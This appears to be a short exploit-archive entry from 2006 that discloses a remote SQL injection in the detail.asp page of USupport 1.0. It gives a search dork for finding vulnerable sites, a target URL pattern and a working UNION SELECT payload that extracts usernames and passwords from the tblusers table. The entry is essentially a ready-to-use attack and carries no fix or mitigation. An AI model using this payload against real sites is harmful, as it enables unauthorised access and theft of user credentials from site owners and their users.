id: 1151
date: 11/12/2006
title: USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
author: ajann
cves: 

============================================================
USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
============================================================


*******************************************************************************
# Title  :  USupport 1.0 (detail.asp) Remote SQL Injection Vulnerability
# Author :   ajann
# Dork   :   UPublisher


*******************************************************************************

###http://[target]/[path]//detail.asp?id=[SQL]

Example:

//detail.asp?id=11%20union%20select%200,username,password,0,0,0%20from%20tblusers

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-24]  #